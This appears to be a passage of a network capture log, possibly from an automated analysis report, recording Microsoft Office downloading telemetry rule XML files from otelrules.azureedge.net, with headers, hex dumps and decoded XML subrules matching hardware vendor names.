                                                                                                                                                                                                            2024-11-22 03:27:08 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:08 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:08 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                            x-ms-request-id: 798eb064-701e-0021-422e-3c3d45000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032708Z-178bfbc474btvfdfhC1NYCa2en00000002f000000000c4xg
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:08 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            39192.168.2.44986813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:08 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:08 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                            x-ms-request-id: 90548f26-b01e-0021-643a-3ccab7000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032708Z-178bfbc474bpnd5vhC1NYC4vr400000002d0000000009n0s
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:08 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            40192.168.2.44987013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:08 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:08 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:08 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 428
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                            x-ms-request-id: a72cf994-301e-0099-6e45-3c6683000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032708Z-15b8b599d882l6clhC1TEBxd5c00000000tg000000006upu
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:08 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            41192.168.2.44986913.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:08 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:08 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                            x-ms-request-id: babf4520-701e-005c-6e46-3cbb94000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032708Z-178bfbc474btrnf9hC1NYCb80g00000002h000000000dhs9
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:08 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            42192.168.2.44987213.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:10 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                            x-ms-request-id: 87817176-601e-003e-034d-3c3248000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032710Z-178bfbc474btrnf9hC1NYCb80g00000002kg0000000087w1
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            43192.168.2.44987413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:10 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                            x-ms-request-id: 3029707a-401e-0047-3163-3b8597000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032710Z-178bfbc474bfw4gbhC1NYCunf400000002e0000000007uey
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            44192.168.2.44987313.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:10 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                            x-ms-request-id: a24720e5-f01e-0096-3f65-3b10ef000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032710Z-178bfbc474bwlrhlhC1NYCy3kg000000029g00000000ptqu
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            45192.168.2.44987113.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:10 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 499
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                            x-ms-request-id: ed298b8a-a01e-0002-322d-3c5074000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032710Z-178bfbc474brk967hC1NYCfu600000000290000000002wz6
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            46192.168.2.44987513.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:10 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                            x-ms-request-id: 52ac3eb7-c01e-0079-7e4e-3ce51a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032710Z-15b8b599d88pxmdghC1TEBux9c00000000wg00000000gqd2
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:10 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            47192.168.2.44987613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:12 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:12 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 420
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                            x-ms-request-id: 81672928-a01e-001e-4184-3b49ef000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032712Z-174c587ffdfdwxdvhC1TEB1c4n00000000qg00000000ms26
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
